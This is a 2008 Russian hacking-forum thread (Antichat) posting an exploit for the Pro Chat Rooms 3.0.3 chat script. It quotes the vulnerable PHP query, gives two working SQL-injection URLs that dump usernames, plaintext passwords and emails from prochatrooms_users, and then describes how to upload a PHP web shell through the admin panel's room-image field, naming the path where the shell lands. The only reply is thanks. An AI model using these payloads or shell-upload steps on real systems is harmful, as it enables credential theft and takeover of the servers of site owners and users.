ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Pro Chat Rooms <= 3.0.3 SQL Injection
  #1  
Старый 28.09.2008, 17:23
Аватар для ~!DoK_tOR!~
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию Pro Chat Rooms <= 3.0.3 SQL Injection

Офф.сайт: www.prochatrooms.com
Demo: www.prochatrooms.com/demo.php
Стоймость: $55 скачать
Префикс таблиц бд: prochatrooms_
Табличка: prochatrooms_users
Клонки: user_name,password,email
Алгоритм шифрования: в открытом виде
Админка: http://localhost/admin/

[SQL Injection]

Сценарий /[installdir]/profiles/index.php

уязвимый код:

PHP код:
$tmp=mysql_query("SELECT * FROM prochatrooms_profiles WHERE user_name ='".$_GET['gud']."'"); 
Отсутствует проверка переменной "gud" что позволяет нам провести SQL-Иньекцию.

Условие: magic_quotes_gpc = Off

Эксплойт:

Код:
http://localhost/[installdir]/profiles/index.php?gud=-1'+union+select+1,concat_ws(0x3a,user_name,password,email),3,4,5,6,7,8+from+prochatrooms_users/*
Сценарий /[installdir]/profiles/admin.php

уязвимый код:

PHP код:
$tmp=mysql_query("SELECT * FROM prochatrooms_profiles WHERE user_name ='".$_GET['gud']."'"); 
Баг оналогичен предыдущему.

Условие: magic_quotes_gpc = Off

Эксплойт:

Код:
http://localhost/[installdir]/profiles/admin.php?gud=-1'+union+select+1,concat_ws(0x3a,user_name,password,email),3,4,5,6,7,8+from+prochatrooms_users/*
[Шелл]

Заходим в админку -> создаём новую комнату (http://localhost/[installdir]/admin/index.php?action=rooms) -> Create New Room

Room name: пишем название комнаты
Password: пароль на комнату
Description: описание
Image*: заливаем наш шелл с расширением .php

Шелл будет тут:

http://localhost/[installdir]/backgrounds/shell.php


http://milw0rm.com/exploits/6612

(c) ~!DoK_tOR!~

Последний раз редактировалось ~!DoK_tOR!~; 29.09.2008 в 00:34..
 
Ответить с цитированием

  #2  
Старый 30.09.2008, 21:12
Аватар для KorevkoDNS
KorevkoDNS
Познающий
Регистрация: 13.09.2008
Сообщений: 40
Провел на форуме:
124727

Репутация: 51
Отправить сообщение для KorevkoDNS с помощью ICQ
По умолчанию

спясяб! жаль + не могу поставить...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ